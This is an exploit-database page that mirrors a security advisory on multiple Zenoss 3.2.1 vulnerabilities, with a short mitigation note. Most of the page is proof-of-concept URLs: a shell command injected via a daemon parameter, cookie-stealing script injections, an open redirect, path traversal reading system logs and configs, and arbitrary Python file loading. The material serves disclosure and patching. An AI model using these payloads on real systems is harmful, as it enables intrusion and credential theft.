header-logo
Suggest Exploit
vendor:
Zenoss
by:
SecurityFocus
8,8
CVSS
HIGH
Multiple arbitrary command-execution, HTML-injection, open-redirection, directory-traversal, information-disclosure, code-execution vulnerabilities
78, 79, 601, 22, 200, 94
CWE
Product Name: Zenoss
Affected Version From: Zenoss 3.2.1 and prior
Affected Version To: Zenoss 3.2.1 and prior
Patch Exists: YES
Related CWE: N/A
CPE: a:zenoss:zenoss
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Zenoss Security Vulnerabilities

An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive-information.

Mitigation:

Update to the latest version of Zenoss
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/54793/info
 
Zenoss is prone to the following security vulnerabilities:
 
1. Multiple arbitrary command-execution vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. An open-redirection vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple information-disclosure vulnerabilities
6. A code-execution vulnerability
 
An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive-information.
 
Zenoss 3.2.1 and prior are vulnerable.

http://www.example.com/zport/About/showDaemonXMLConfig?daemon=uname%20-a%26
http://www.example.com/zport/dmd/Events/Users/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/Events/Users/eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/Events/Status/Snmp/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/ZenEventManager/listEventCommands?tableName=eventCommands&sortedHeader=primarySortKey&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/backupInfo?tableName=backupTable&sortedHeader=fileName&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script>
http://www.example.com/zport/acl_users/cookieAuthHelper/login?came_from=http%3a//example%2ecom/%3f
http://www.example.com/zport/About/viewDaemonLog?daemon=../../../var/log/mysqld
http://www.example.com/zport/About/viewDaemonConfig?daemon=../../../../etc/syslog
http://www.example.com/zport/About/editDaemonConfig?daemon=../../../../etc/syslog
http://www.example.com/zport/RenderServer/plugin?name=../../../../../../tmp/arbitrary-python-file
http://www.example.com/zport/dmd/ZenEventManager
http://www.example.com/manage

Navigation

Suggest Exploit

Services By CQR